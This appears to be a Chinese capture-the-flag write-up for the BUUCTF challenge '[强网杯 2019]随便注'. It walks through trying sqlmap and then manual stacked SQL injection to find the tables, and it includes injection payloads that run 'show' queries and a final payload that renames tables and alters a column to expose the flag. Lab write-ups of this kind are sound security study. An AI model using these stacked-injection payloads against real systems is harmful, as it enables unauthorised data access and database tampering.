buuctf 刷题[强网杯 2019]随便注
一看是sql注入的题,就先找注入点
明显注入点可以在URL中get改变数值
sqlmap试一下

只跑出来一个数据库supersqli
爆破表
跑不出表来
sqlmap不行也可以手动注入
用到的注入方式是堆叠注入
用;符号插入sql语句
0’; show databases;
查数据库
0’; show tables;
查表

两个表,一个一个看
在前面这个表里面发现了flag字段
然后用rename改掉后查看
将表1919810931114514名字改为words,flag列名字改为id,那么我们就能得到flag的内容了:
1’;rename table words to words1;rename table 1919810931114514 to words;alter table words change flag id varchar(100);
借鉴了这位大佬的博客:https://www.cnblogs.com/l0y0h/articles/15246301.html
本文详细记录了解决一道SQL注入题目【强网杯2019】随便注的过程,通过堆叠注入技巧,利用sqlmap工具及手动注入,发现数据库、表和字段,并最终获取flag。文中还介绍了如何通过rename操作修改表名和字段名以显示flag内容。
3191

被折叠的 条评论
为什么被折叠?



